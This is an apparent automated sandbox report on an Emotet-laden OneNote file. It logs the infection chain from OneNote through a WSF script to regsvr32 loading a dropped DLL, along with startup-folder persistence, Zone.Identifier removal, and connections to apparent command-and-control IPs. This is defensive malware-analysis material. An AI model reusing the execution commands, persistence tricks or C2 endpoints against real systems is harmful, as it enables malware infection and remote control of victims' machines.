Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01053B14	13_2_01053B14
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105E310	13_2_0105E310
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01068310	13_2_01068310
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01065B1C	13_2_01065B1C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01054F18	13_2_01054F18
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104D33C	13_2_0104D33C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105E750	13_2_0105E750
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104975C	13_2_0104975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01044758	13_2_01044758
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01068B68	13_2_01068B68
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105D770	13_2_0105D770
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105CF70	13_2_0105CF70
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104F77C	13_2_0104F77C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01048378	13_2_01048378
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01055384	13_2_01055384
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01041B94	13_2_01041B94
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104DBA0	13_2_0104DBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010647A8	13_2_010647A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01048FB0	13_2_01048FB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104FFB8	13_2_0104FFB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01058BB8	13_2_01058BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010597CC	13_2_010597CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01042FD4	13_2_01042FD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010433D4	13_2_010433D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010627EC	13_2_010627EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104A7F0	13_2_0104A7F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105FFFC	13_2_0105FFFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01055A00	13_2_01055A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01068A00	13_2_01068A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01043E0C	13_2_01043E0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105020C	13_2_0105020C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01058E08	13_2_01058E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01044214	13_2_01044214
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104461C	13_2_0104461C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104BA2C	13_2_0104BA2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01058A2C	13_2_01058A2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01050E2C	13_2_01050E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105662C	13_2_0105662C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104263C	13_2_0104263C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105A244	13_2_0105A244
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01066E48	13_2_01066E48
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104F65C	13_2_0104F65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104B258	13_2_0104B258
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104A660	13_2_0104A660
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01043274	13_2_01043274
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01050A70	13_2_01050A70
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01062E84	13_2_01062E84
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01048A8C	13_2_01048A8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01064E8C	13_2_01064E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104BE90	13_2_0104BE90
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01054A90	13_2_01054A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01062AB0	13_2_01062AB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01043ABC	13_2_01043ABC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105A6BC	13_2_0105A6BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104AAB8	13_2_0104AAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01044EB8	13_2_01044EB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105EAC0	13_2_0105EAC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0104D6CC	13_2_0104D6CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010596D4	13_2_010596D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010492F0	13_2_010492F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_010636FC	13_2_010636FC

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,	12_2_0000000180010C10
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,	12_2_0000000180010AC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,	12_2_0000000180010DB0

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253

Source: Insight_Medical_Publishing_4.one	ReversingLabs: Detection: 33%
Source: Insight_Medical_Publishing_4.one	Virustotal: Detection: 40%

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_4.one
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BqnZyHskpeTuo\PjkJxfQvhUP.dll"
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BqnZyHskpeTuo\PjkJxfQvhUP.dll"	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Jump to behavior

Source: Send to OneNote.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\Documents\{4F9D4FA7-F550-4E9A-B744-8AA5F9719A19}

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user~1\AppData\Local\Temp\{86590038-9E33-45B4-A336-008325B4A44C} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winONE@12/695@1/49

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_005C8BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,

12_2_005C8BC8

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE

Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared

Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180005C69 push rdi; ret	12_2_0000000180005C72
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_00000001800056DD push rdi; ret	12_2_00000001800056E4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C6CDE push esi; iretd	12_2_005C6CDF
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D80D7 push ebp; retf	12_2_005D80D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CA0FC push ebp; iretd	12_2_005CA0FD
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C6C9F pushad ; ret	12_2_005C6CAA
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D8157 push ebp; retf	12_2_005D8158
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C9D51 push ebp; retf	12_2_005C9D5A
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D7D4E push ebp; iretd	12_2_005D7D4F
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D7D3C push ebp; retf	12_2_005D7D3D
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D7D25 push 4D8BFFFFh; retf	12_2_005D7D2A
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CA1D2 push ebp; iretd	12_2_005CA1D3
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D7987 push ebp; iretd	12_2_005D798F
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005CA26E push ebp; ret	12_2_005CA26F
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005C9E8B push eax; retf	12_2_005C9E8E
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005D7EAF push 458BCC5Ah; retf	12_2_005D7EBC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_005DC731 push esi; iretd	12_2_005DC732
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_01066D34 push edi; ret	13_2_01066D36
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_0105C731 push esi; iretd	13_2_0105C732

Source: rad16F69.tmp.dll.10.dr

Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll

Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\BqnZyHskpeTuo\PjkJxfQvhUP.dll (copy)			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\System32\BqnZyHskpeTuo\PjkJxfQvhUP.dll (copy)

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\system32\BqnZyHskpeTuo\PjkJxfQvhUP.dll:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe TID: 2200	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6004	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4108	Thread sleep time: -270000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

API coverage: 9.3 %

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180008D28 FindFirstFileExW,

12_2_0000000180008D28

Source: C:\Windows\System32\regsvr32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: wscript.exe, 0000000A.00000003.351129018.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329298977.0000000005955000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354489899.000000000595B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.0000000005955000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353306127.0000000005959000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.
Source: wscript.exe, 0000000A.00000003.351129018.0000000005957000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354379182.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.346976631.000000000584E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329298977.0000000005955000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349340106.000000000587E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354489899.000000000595B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.0000000005955000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350121296.00000000058BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349605880.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349744376.00000000058B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349194761.000000000586D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 0000000D.00000003.410330799.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.433728463.00000000010BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_0000000180001C48

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_000000018000A878 GetProcessHeap,

12_2_000000018000A878

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,

12_2_0000000180010C10

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000000180001C48
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000001800082EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00000001800017DC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.65.88.10 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 164.90.222.65 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 203.26.41.131 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 66.228.32.31 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 187.63.160.88 80	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 104.168.155.143 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.89.202.34 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.121.146.47 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 160.16.142.56 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 167.172.199.165 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 163.44.196.120 8080	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_00000001800070A0 cpuid

12_2_00000001800070A0

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_0000000180001D98

Stealing of Sensitive Information

Yara detected Malicious OneNote

Source: Yara match	File source: Insight_Medical_Publishing_4.one, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\Insight_Medical_Publishing_4.one, type: DROPPED

Yara detected Emotet

Source: Yara match	File source: 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 13.2.regsvr32.exe.1010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.1010000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.571771558.0000000001041000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.327461788.0000000000590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.571413418.0000000001010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Malicious OneNote

Source: Yara match	File source: Insight_Medical_Publishing_4.one, type: SAMPLE
